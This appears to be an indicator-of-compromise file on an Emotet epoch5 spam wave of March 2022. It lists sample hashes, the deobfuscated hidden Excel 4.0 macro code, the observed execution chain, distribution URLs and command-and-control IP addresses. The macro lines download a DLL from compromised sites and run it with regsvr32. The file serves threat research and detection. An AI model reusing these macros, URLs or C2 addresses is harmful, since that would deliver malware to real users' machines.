-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathe5_emotet_07.03.2022.txt
125 lines (89 loc) · 8.14 KB
/
e5_emotet_07.03.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
Emotet 2022 | epoch5 | 07.03.2022 |
************************************************************************************************************
.xls c714a8c704bb0076cc6929c9d7253a0c174d45623e5a02f5249e6adebfc4b65c
.xls f8df82e32c99d37c96565ef09644c78575b7408b6c4dae2c3fde26877090d388
.dll be37bc624cfb6af0aea1bd02b5fbca8a27a1509d12ad539d46fae415bd5811a5
************************************************************************************************************
Hidden Macro sheets:
=FORMULA('W1'!D17,'W2'!C8)=FORMULA(Fgsgb1!P22&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!F18&Gefs1!P2&Gefs1!R11,E11)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA1"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!G19&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E13)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA2"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!H18&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E15)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA3"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!I19&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E17)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA4"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!J18&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E19)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA5"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!K19&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E21)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA6"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!B15&Fgsgb1!I17&Fgsgb1!I3&Fgsgb1!H13&Fgsgb1!P11&Fgsgb1!K9&Fgsgb1!P13&Fgsgb1!P7&Fgsgb1!P13,E23)=FORMULA(Fgsgb1!P22&Fgsgb1!H13&Fgsgb1!N4&Fgsgb1!H13&Fgsgb1!H9&Fgsgb1!P11&Fgsgb1!P15&Fgsgb1!H9&Fgsgb1!P20&Gefs1!N8&Gefs1!S16&Gefs1!L13&Gefs1!S3&Gefs1!B14&Fgsgb1!P13,E25)=FORMULA(Fgsgb1!P22&Fgsgb1!G24&Fgsgb1!H13&Fgsgb1!I26&Fgsgb1!E11&Fgsgb1!G24&Fgsgb1!K23&Fgsgb1!P11&Fgsgb1!P13,E33)
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sorathlions.com/tmp/bfJrKD4g0bJL73qw/","..\si.ocx",0,0)
=IF(FGTA1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.invest-moon.com/wp-admin/2PbOcXXyFr4oFoogAA/","..\si.ocx",0,0))
=IF(FGTA2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://narsanatanaokulu.com/wp-includes/reZNtZ53IH/","..\si.ocx",0,0))
=IF(FGTA3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ramijabali.com/licenses/WQu8ZS0qQNGp/","..\si.ocx",0,0))
=IF(FGTA4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://support.techopesolutions.com/gq2z3/yt7TquOtSLXXeade/","..\si.ocx",0,0))
=IF(FGTA5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://blog.centerking.top/wp-includes/YvwIBPBq/","..\si.ocx",0,0))
=IF(FGTA6<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx")
=FORMULA('W1'!D17,'W2'!C8)=FORMULA(Fgsgb1!P22&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!F18&Gefs1!P2&Gefs1!R11,E11)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA1"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!G19&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E13)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA2"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!H18&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E15)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA3"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!I19&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E17)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA4"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!J18&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E19)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA5"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!L2&Fgsgb1!B15&Fgsgb1!B15&Gefs1!C4&Gefs1!D10&Gefs1!F7&'W2'!C8&Fgsgb1!L2&Gefs1!I5&Gefs1!L1&Gefs1!K19&Gefs1!P2&Gefs1!R11&Fgsgb1!P13,E21)=FORMULA(Fgsgb1!P22&Fgsgb1!J11&Fgsgb1!B18&Fgsgb1!P11&"FGTA6"&Fgsgb1!P9&Fgsgb1!K9&Fgsgb1!P7&Fgsgb1!P19&Fgsgb1!H9&Fgsgb1!B15&Fgsgb1!I17&Fgsgb1!I3&Fgsgb1!H13&Fgsgb1!P11&Fgsgb1!K9&Fgsgb1!P13&Fgsgb1!P7&Fgsgb1!P13,E23)=FORMULA(Fgsgb1!P22&Fgsgb1!H13&Fgsgb1!N4&Fgsgb1!H13&Fgsgb1!H9&Fgsgb1!P11&Fgsgb1!P15&Fgsgb1!H9&Fgsgb1!P20&Gefs1!N8&Gefs1!S16&Gefs1!L13&Gefs1!S3&Gefs1!B14&Fgsgb1!P13,E25)=FORMULA(Fgsgb1!P22&Fgsgb1!G24&Fgsgb1!H13&Fgsgb1!I26&Fgsgb1!E11&Fgsgb1!G24&Fgsgb1!K23&Fgsgb1!P11&Fgsgb1!P13,E33)
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/OevI7Yy0i6YShxFl/","..\si.ocx",0,0)
=IF(FGTA1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/","..\si.ocx",0,0))
=IF(FGTA2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/","..\si.ocx",0,0))
=IF(FGTA3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/","..\si.ocx",0,0))
=IF(FGTA4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://1000paginas.com/tienda/vWtT/","..\si.ocx",0,0))
=IF(FGTA5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/","..\si.ocx",0,0))
=IF(FGTA6<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\si.ocx")
************************************************************************************************************
Exec >>
EXCEL.EXE /dde C:\Users\Admin\AppData\Local\Temp\pièce jointe_16474642.xlsm
regsvr32.exe -s ..\si.ocx
regsvr32.exe /s C:\Windows\SysWOW64\Wfdywfjhzerope\mkxoz.hux
************************************************************************************************************
.dll distro
http://sorathlions.com/tmp/bfJrKD4g0bJL73qw/
http://www.invest-moon.com/wp-admin/2PbOcXXyFr4oFoogAA/
http://narsanatanaokulu.com/wp-includes/reZNtZ53IH
https://ramijabali.com/licenses/WQu8ZS0qQNGp/
http://support.techopesolutions.com/gq2z3/yt7TquOtSLXXeade/
http://blog.centerking.top/wp-includes/YvwIBPBq/
http://henrysfreshroast.com/OevI7Yy0i6YShxFl/
http://www.ajaxmatters.com/c7g8t/nnzJJ1rKFD2P/
http://aopda.org/wp-content/uploads/5oTAVJyjDFOllX2uE/
https://winnieswondersaviary.com/wp-content/mxPfty43IionmElgK3h/
http://1000paginas.com/tienda/vWtT/
http://crm.techopesolutions.com/b48om9p6/vquxKuTvTj/
c2's
51.75.33.122:443
186.250.48.5:80
168.119.39.118:443
207.148.81.119:8080
194.9.172.107:8080
139.196.72.155:8080
78.47.204.80:443
159.69.237.188:443
45.71.195.104:8080
54.37.106.167:8080
185.168.130.138:443
37.44.244.177:8080
185.184.25.78:8080
185.148.168.15:8080
128.199.192.135:8080
37.59.209.141:8080
103.41.204.169:8080
185.148.168.220:8080
103.42.58.120:7080
78.46.73.125:443
68.183.93.250:443
190.90.233.66:443
5.56.132.177:8080
62.171.178.147:8080
196.44.98.190:8080
168.197.250.14:80
66.42.57.149:443
59.148.253.194:443
104.131.62.48:8080
191.252.103.16:80
54.37.228.122:443
88.217.172.165:8080
195.77.239.39:8080
116.124.128.206:8080
93.104.209.107:8080
118.98.72.86:443
217.182.143.207:443
87.106.97.83:7080
210.57.209.142:8080
54.38.242.185:443
195.154.146.35:443
203.153.216.46:443
198.199.98.78:8080
85.214.67.203:8080